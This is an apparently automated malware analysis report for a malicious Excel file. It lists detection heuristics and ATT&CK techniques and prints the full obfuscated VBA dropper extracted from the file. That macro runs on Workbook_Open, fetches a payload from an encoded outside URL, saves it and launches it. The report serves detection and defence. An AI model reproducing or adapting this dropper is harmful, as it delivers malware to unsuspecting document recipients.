Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e88900700b8982b5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 93.0 KB
Created: 2020-01-23 05:36:40
Authoring application: Microsoft Excel
First seen: 2020-05-25
MD5: fd2e98ae762daaa9b265a4f717f19495
SHA-1: 52c72a606fce7d9d49f58631031c08f763999e1c
SHA-256: e88900700b8982b5bf8723d4737be690cee06ec427c997e3bac2c1aa442179a5
Risk score: 348

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The Workbook_Open auto-exec handler (OLE_VBA_WBOPEN) is the entire dropper. WScript.Shell (OLE_VBA_WSCRIPT) is used only to resolve the user's Templates folder through SpecialFolders("Templates"); the download itself is a Microsoft.XMLHTTP GET, the response body is written to that folder in binary mode with ADODB.Stream (Type = 1, SaveToFile with overwrite flag 2), which is what OLE_VBA_HTTP_DROP_EXEC flags, and the dropped file is then launched with Shell.Application.Open. Note that the Status = 200 check guards only the write: the Open call sits outside the If block and runs regardless. Neither the download URL nor the dropped filename is visible in the source; both are passed through a character-substitution decoder defined in the same module, and every identifier is a long run of Latin-1 symbol characters to defeat keyword matching. The message box "Windows cannot open this image on this computer" is raised from inside Workbook_Open, so it can only appear once macros are already running; it is a decoy that explains the lack of visible content after execution, not the enable-content lure itself (SE_ENABLE_LURE). The ClamAV signature Xls.Dropper.Agent-7559029-0 independently confirms the verdict.

Heuristics (9)

  • ClamAV: Xls.Dropper.Agent-7559029-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7559029-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set WshShell = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢© = £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WshShell = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12195 bytes
SHA-256: 2ea3c4ba976357fc896208adfa7ab1e592734f0b65e1d4dc7a739672e99cc541

Script preview (first 1,000 lines of the extracted source):
Attribute VB_Name = "Module1"
Sub winOrigin()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim ¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½ As Integer
¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½ = Chr(50) + Chr(48) + Chr(48)
  Dim WshShell As Object
    Dim SpecialPath As String

    Set WshShell = CreateObject("WScript.Shell")
    SpecialPath = WshShell.SpecialFolders("Templates")
Dim ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿
Dim ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©
Dim £¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º
Dim ©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»
Dim ¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«
Dim «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« As Integer
Dim £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©
Dim ¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©
«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« = 1

Range("A1").Value = "Windows cannot open this image on this computer"
MsgBox "Windows cannot open this image on this computer"

Set £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯© = CreateObject("microsoft.xmlhttp")
Set ¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£« = CreateObject("Shell.Application")

©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨» = SpecialPath + ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢("\¶¶ØRKGK¥.ÂÛÂ")
£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.Open "get", ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢("hÖÖÓÕ://ÖhÂmÂÖÀlÒÃÃÄÁÂmÂÀlÕ.ÁÒm.Ól/hÒÒkÂÔ/bÙÄld_Fâ0².ÂÛÂ"), False
£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.send
¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢© = £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.responseBody
If £«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©.Status = 200 Then
Set ©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿ = CreateObject("adodb.stream")
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Open
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Type = «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Write ¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.SaveToFile ©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨», «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡«« + «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««
©¶³«ª¹½¦¢¨»¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿.Close
End If
¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«.Open (©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»)
End Sub

    Public Function ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ)
        ¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
        ´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§² = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ)
            ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º = InStr(¸¸¸º²¶º«µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼, Mid(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ, i, 1))
            If ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º > 0 Then
                «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª = Mid(´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§², ¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ¬¹¿¬¯¨³»¿¯©¶³«ª¹½¦¢¨»¸¸¸º²¶º, 1)
                ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· + «µµ½¸¹µ«¶§¨¼µ®»¶¾ªºº³³¬§°®¢¯¡º®»¹¶¯¾£¬¦£¥²¼¼¦¥²¿´©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª
            Else
                ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹· + Mid(©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·½§²¾·¼¥¨º»¡»¾«½²··¶¹¨¤°¬¥¦´¶¸³®¤¨½³´¿²µ½»°¹§§¹¾©·¬·ª°¯°¸´¾µ, i, 1)
            End If
        Next
        ©¡¬¨´¸²ª®¬®«»·»¢¾¶¿®«¾¢¿³§©¿¤©¿§¡««¼´ª³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢ = ³º¬¸®º¼¤ª¬¿¥§·«´·µ¼½¨µµ»¯½°¹ª²½º´©££¤¡ª¯ª¸¯¿¦¤¢§¸®¼´¨¦¶¨¥³¹©¢©¾¡¼¼£®£«©¶©£¦µ´¯¢½¹·
    End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True